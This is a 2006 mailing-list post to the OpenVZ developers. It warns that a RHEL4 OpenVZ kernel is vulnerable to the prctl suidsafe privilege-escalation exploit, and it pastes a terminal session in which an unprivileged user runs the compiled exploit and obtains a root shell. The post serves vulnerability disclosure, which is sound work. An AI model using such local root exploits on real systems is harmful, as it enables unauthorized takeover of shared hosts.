[Devel] IMPORTANT: latest RHEL4 kernel has a root exploit!! (2.6.9-023stab016.2)

Avi Brender abrender at elitehosts.com
Wed Oct 11 18:47:06 PDT 2006


Hi,
 
    The latest RHEL4 kernel for OpenVZ (2.6.9-023stab016.2) available at
http://openvz.org/download/kernel/rhel4/ is vulnerable to the PRCTL exploit:
http://isc.sans.org/diary.php?storyid=1482
 
Example session of "nobody" running the exploit and getting a root shell:
 
[root@mailin-02node tmp]# uname -a
Linux mailin-02node.elitehosts.com 2.6.9-023stab016.2 #1 Thu Aug 10 23:39:42 MSD 2006 i686 i686 i386 GNU/Linux
[root@mailin-02node tmp]# su nobody
bash-3.00$ ls -ld 05
-rwxr-xr-x  1 nobody nobody 13298 Oct 11 21:42 05
bash-3.00$ ./05
 
prctl() suidsafe exploit
 
(C) Julien TINNES
 
[+] Installed signal handler
[+] We are suidsafe dumpable!
[+] Malicious string forged
[+] Segfaulting child
[+] Waiting for exploit to succeed (~26 seconds)
[+] getting root shell
sh-3.00# whoami
root
sh-3.00# uname -a
Linux mailin-02node.elitehosts.com 2.6.9-023stab016.2 #1 Thu Aug 10 23:41:42 MSD 2006 i686 i686 i386 GNU/Linux
sh-3.00#
 
---------------------------
Avi  Brender
abrender at elitehosts.com
Elite Hosts, Inc